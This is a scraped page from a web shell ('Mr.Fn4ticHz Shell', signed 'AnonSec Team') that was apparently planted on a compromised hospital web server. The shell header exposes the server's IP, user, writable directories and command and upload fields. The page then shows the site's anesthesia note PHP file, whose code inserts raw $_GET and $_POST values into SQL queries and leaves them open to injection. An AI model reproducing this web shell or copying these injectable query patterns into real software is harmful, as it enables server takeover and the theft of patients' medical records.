Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.144.98.21
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Anesthesia_Note1_mod.php
<?php session_start();
include 'dbconnection.php';
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST['submit'])) 
{
   PatientManager::Anesthesianote("$_GET[prescriptionid]","$_GET[patientid]","$_GET[surgeryid]","$_POST[Name_Anesthetist]","$_POST[Name_of_Surgeon]","$_POST[member_1]","$_POST[member_2]","$_POST[Proposed_Surgery]","$_POST[Duration]","$_POST[Duration_time]","$_POST[Pre_Operative_Diagnosis]","$_POST[Anesthesia_Type]","$_POST[Procedure_Executed]","$_POST[Procedure_performed]","$_POST[Surgeon_Note]","$_POST[Anesthetic_Note]","$_POST[Patient_Status]","$_POST[Expected_Outcome]" ,"$_POST[Expected_Outcome2]" ,"$_POST[Expected_Outcome3]","$_POST[Record_time_Death]","$_POST[Revesalr]","$_POST[Post_Op_advice]","$_POST[entered_by]");
}
?>



<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".box").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".box").hide();
            }
        });
    }).change();
});
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".babyya").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".babyya").hide();
            }
        });
    }).change();
});
function myFunction102() {
  var checkBox = document.getElementById("myCheck102");
  var text = document.getElementById("text102");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
</script>

		<div class="center">
<?php 
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
		$sql ="SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "

		    <div class=''>
    <!-- Content Header (Page header) -->
    <section class='content-header' style='width:100%;'>
    <table class='table table-bordered table-hover'>
<legend>Operative Note</legend>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp; Pt. Name: </td>
<td >$rs[patientname]</td>
</tr>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp;  W/O,D/O,S/O. :  </td>
<td >$rs[HusbandName]</td>
</tr>
<tr>
<td > &nbsp;  &nbsp; &nbsp; &nbsp; Age:  </td>
<td >$rs[dob]</td>
</tr>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp; Sex : </td>
<td >$rs[gendor]</td>
</tr>
 ";
	  echo "</td></tr>";	}
		?>
<form name='submit' method='post'>
 
                 
        </table>
        <table class='table table-bordered table-hover'> 
<tr><td></td></tr>        
</table>
<br>
      <table class='table table-bordered table-hover' style="width:100%;">
     
   <tr>
<td>Procedure Executed : </td><td>
<input type='text' placeholder='Procedure Executed' name='Procedure_Executed'>
</td>
</tr>

  <tr>
<td>Detail of Emergency procedure performed:  </h3></td><td>
<input type='text' placeholder='Procedure Executed' name='Procedure_performed'>
</td>
</tr>

  <tr>
<td>Surgeon Note :  </h3></td><td>
<textarea name="Surgeon_Note" rows="2" cols="70">
</textarea>
</td>
</tr>

 <tr>
<td>Anesthetic Note :  </h3></td><td>
<textarea name="Anesthetic_Note" rows="2" cols="70">
</textarea>
</td>
</tr>
 <tr>

  <tr>
 <td style='width:50%'>Patient Status:  
 </td>
 <td style='width:50%'>
     <div>
         <select onChange="getstate(this.value);" name="country" id="country">
             <option>-----Select Patient Status-----</option>
 <option value="Under_Observation">Under Observation </option>
  <option value="Successful_and_Stable">Successful and Stable  </option>
   <option value="Critical_and_Unstable">Critical and Unstable </option>
    <option value="Dead">Dead </option>
 </select>
    </div>
     
    
 

 </td>
 </tr>
 
 
  <?php include('loadiv1.php'); ?>



  


  <tr>
<td>Reversal : </h3></td><td>
<textarea name="Revesalr" rows="3" cols="70">
</textarea>
</td>
</tr>


  <tr>
<td>Post Op. advice:  </h3></td><td>
<textarea name="Post_Op_advice" rows="3" cols="70">
</textarea>
</td>
</tr>



</table>
  
<input type="submit" name="submit" value="Submit"> 
</form>
		</div>
		
		

<script>
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".box").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".box").hide();
            }
        });
    }).change();
});
</script>
<style>
    .box{
        color: black;
        padding: 20px;
        display: none;
        margin-top: 20px;
    }

</style>

<script>
function getstate(val) {
	//alert(val);
	$.ajax({
	type: "POST",
	url: "loadiv1.php",
	data:'coutrycode='+val,
	success: function(data){
		$("#statelist").html(data);
	}
	});
}
</script>

Anon7 - 2022
AnonSec Team